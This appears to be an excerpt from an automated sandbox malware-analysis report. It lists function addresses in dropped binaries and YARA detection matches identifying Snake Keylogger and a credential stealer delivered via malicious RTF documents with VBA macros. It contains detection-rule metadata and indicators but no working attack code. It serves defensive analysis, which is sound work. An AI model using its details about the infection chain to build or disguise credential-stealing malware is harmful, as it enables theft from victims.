                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021B7EA020_2_021B7EA0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021B98A020_2_021B98A0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021B4ED820_2_021B4ED8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021BD5D820_2_021BD5D8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021BFBD820_2_021BFBD8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021B68D820_2_021B68D8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021BC8D020_2_021BC8D0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021B41D020_2_021B41D0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021B5BD020_2_021B5BD0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021B34C820_2_021B34C8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021BBBC820_2_021BBBC8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021B4EC820_2_021B4EC8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021BAEC020_2_021BAEC0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021B41C020_2_021B41C0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021B82F820_2_021B82F8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021B75F020_2_021B75F0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021B8FF020_2_021B8FF0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021B68E820_2_021B68E8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021B82E820_2_021B82E8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021B5BE020_2_021B5BE0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021BE4E020_2_021BE4E0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021B75E020_2_021B75E0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_022E3C3820_2_022E3C38
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_022E431820_2_022E4318
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_022E2E7820_2_022E2E78
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_022E004020_2_022E0040
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_022E355820_2_022E3558
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_022E57B820_2_022E57B8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_022E49F820_2_022E49F8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_022E50D820_2_022E50D8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_022E3C2920_2_022E3C29
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_022E212120_2_022E2121
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_022E213020_2_022E2130
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_022E430820_2_022E4308
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_022E000620_2_022E0006
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_022E2B0020_2_022E2B00
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_022E2E6820_2_022E2E68
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_022E354820_2_022E3548
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_022E2A5020_2_022E2A50
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_022E57A820_2_022E57A8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_022E49E820_2_022E49E8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_022E29CE20_2_022E29CE
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_022E50C920_2_022E50C9
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_022E0ED820_2_022E0ED8
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 22_2_002504D822_2_002504D8
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 22_2_00259AB022_2_00259AB0
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 22_2_0025D00022_2_0025D000
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 22_2_0025D4E822_2_0025D4E8
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 22_2_0025D4D922_2_0025D4D9
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 22_2_0025C77422_2_0025C774
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 22_2_0025C79022_2_0025C790
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 22_2_0025CBC822_2_0025CBC8
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 22_2_0025DE9022_2_0025DE90
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_0020E01829_2_0020E018
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_002040F829_2_002040F8
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_0020390C29_2_0020390C
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_0020496829_2_00204968
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_002031B129_2_002031B1
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_0020918829_2_00209188
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00208AA829_2_00208AA8
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_002043C829_2_002043C8
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_002083CC29_2_002083CC
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00206C8029_2_00206C80
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_0020348329_2_00203483
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00205D0029_2_00205D00
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00209D1029_2_00209D10
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00203E2829_2_00203E28
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_0020469929_2_00204699
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_0020775829_2_00207758
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_0020E00829_2_0020E008
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_0020F00929_2_0020F009
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_0020D88129_2_0020D881
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_0020D89029_2_0020D890
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_0020F93929_2_0020F939
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_0020EB7029_2_0020EB70
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_0020F4A129_2_0020F4A1
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A9F07829_2_00A9F078
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A9250029_2_00A92500
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A9874829_2_00A98748
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A9C0A829_2_00A9C0A8
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A980A029_2_00A980A0
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A9A8B029_2_00A9A8B0
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A9D88029_2_00A9D880
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A9D89029_2_00A9D890
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A9809029_2_00A98090
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A944E829_2_00A944E8
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A990CB29_2_00A990CB
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A9A8C029_2_00A9A8C0
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A904D829_2_00A904D8
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A990D829_2_00A990D8
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A944D829_2_00A944D8
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A97C0829_2_00A97C08
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A98C1029_2_00A98C10
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A9206829_2_00A92068
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A9606829_2_00A96068
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A9F06729_2_00A9F067
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A9607829_2_00A96078
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A9004029_2_00A90040
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A9404029_2_00A94040
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A9405029_2_00A94050
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A969A829_2_00A969A8
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A995A029_2_00A995A0
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A9AD8829_2_00A9AD88
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A9958F29_2_00A9958F
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A9498029_2_00A94980
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A9299829_2_00A92998
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A9699B29_2_00A9699B
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A9F9F729_2_00A9F9F7
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A9F53029_2_00A9F530
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A9650329_2_00A96503
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A9651029_2_00A96510
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A9097029_2_00A90970
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A9C57029_2_00A9C570
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A9497029_2_00A94970
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A9AD7729_2_00A9AD77
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A9DD4829_2_00A9DD48
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A9F54029_2_00A9F540
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A9DD5829_2_00A9DD58
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A912A029_2_00A912A0
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A952A029_2_00A952A0
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A932BB29_2_00A932BB
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A952B029_2_00A952B0
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A9129129_2_00A91291
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A9E6E829_2_00A9E6E8
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A9E6E029_2_00A9E6E0
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A932C829_2_00A932C8
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A972C829_2_00A972C8
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A972D829_2_00A972D8
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A9E22029_2_00A9E220
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A9CA3829_2_00A9CA38
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A92E3029_2_00A92E30
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A96E3029_2_00A96E30
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A9863329_2_00A98633
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A9CA3629_2_00A9CA36
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A90E0829_2_00A90E08
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A9FA0829_2_00A9FA08
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A94E0829_2_00A94E08
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A94E1829_2_00A94E18
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A9E21129_2_00A9E211
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A99A6829_2_00A99A68
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A99A6029_2_00A99A60
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A9866529_2_00A98665
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A96E4029_2_00A96E40
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A9B24029_2_00A9B240
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A9865129_2_00A98651
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A9B25029_2_00A9B250
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A9EBA129_2_00A9EBA1
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A9D3B829_2_00A9D3B8
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A9EBB029_2_00A9EBB0
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A93BE929_2_00A93BE9
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A9A3E829_2_00A9A3E8
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A95BE029_2_00A95BE0
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A9BBE029_2_00A9BBE0
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A93BF829_2_00A93BF8
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A9A3F829_2_00A9A3F8
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A97BF829_2_00A97BF8
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A98BFF29_2_00A98BFF
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A9D3C829_2_00A9D3C8
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A91BC129_2_00A91BC1
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A95BD129_2_00A95BD1
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A91BD029_2_00A91BD0
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A99F2029_2_00A99F20
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A9173829_2_00A91738
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A9573829_2_00A95738
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A99F3029_2_00A99F30
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A9CF0029_2_00A9CF00
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A9B70729_2_00A9B707
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A9B71829_2_00A9B718
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A9776129_2_00A97761
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A9376029_2_00A93760
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A9777029_2_00A97770
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A9574829_2_00A95748
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_00A9375029_2_00A93750
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_020E2C0029_2_020E2C00
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_020E5E0029_2_020E5E00
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_020E900029_2_020E9000
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_020E7A1029_2_020E7A10
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_020E162029_2_020E1620
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_020E482029_2_020E4820
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_020E7A2029_2_020E7A20
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_020E963029_2_020E9630
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_020E004029_2_020E0040
                Source: tmpD135.tmp.10.dr | OLE indicator, VBA macros: true
                Source: ~WRF{1C83C99B-998E-4DEF-B324-E69763DD529E}.tmp.0.dr | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                Source: tmpD135.tmp.10.dr | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                Source: 10.2.swagodi78811.scr.316cb90.4.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 10.2.swagodi78811.scr.316cb90.4.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 10.2.swagodi78811.scr.316cb90.4.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 20.2.swagodi78811.scr.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 20.2.swagodi78811.scr.400000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 20.2.swagodi78811.scr.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 10.2.swagodi78811.scr.3129570.6.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 10.2.swagodi78811.scr.3129570.6.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 10.2.swagodi78811.scr.3129570.6.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 10.2.swagodi78811.scr.316cb90.4.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 10.2.swagodi78811.scr.316cb90.4.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 10.2.swagodi78811.scr.316cb90.4.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 10.2.swagodi78811.scr.3129570.6.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 10.2.swagodi78811.scr.3129570.6.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 10.2.swagodi78811.scr.3129570.6.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000014.00000002.663140063.000000000042B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0000000A.00000002.412121084.0000000003129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: swagodi78811.scr PID: 3468, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: swagodi78811.scr PID: 3880, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9F4A4ED3.doc, type: DROPPED | Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\swagodi[1].doc, type: DROPPED | Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                Source: swagodi[1].scr.9.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: swagodi78811.scr.9.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: gRpkBp.exe.10.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 10.2.swagodi78811.scr.3508af0.7.raw.unpack, fgdXJt4fnOeV6XjIJC.cs | Security API names: _0020.SetAccessControl
                Source: 10.2.swagodi78811.scr.3508af0.7.raw.unpack, fgdXJt4fnOeV6XjIJC.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 10.2.swagodi78811.scr.3508af0.7.raw.unpack, fgdXJt4fnOeV6XjIJC.cs | Security API names: _0020.AddAccessRule
                Source: 10.2.swagodi78811.scr.3483cd0.5.raw.unpack, fgdXJt4fnOeV6XjIJC.cs | Security API names: _0020.SetAccessControl
                Source: 10.2.swagodi78811.scr.3483cd0.5.raw.unpack, fgdXJt4fnOeV6XjIJC.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 10.2.swagodi78811.scr.3483cd0.5.raw.unpack, fgdXJt4fnOeV6XjIJC.cs | Security API names: _0020.AddAccessRule
                Source: 10.2.swagodi78811.scr.4630000.8.raw.unpack, fgdXJt4fnOeV6XjIJC.cs | Security API names: _0020.SetAccessControl
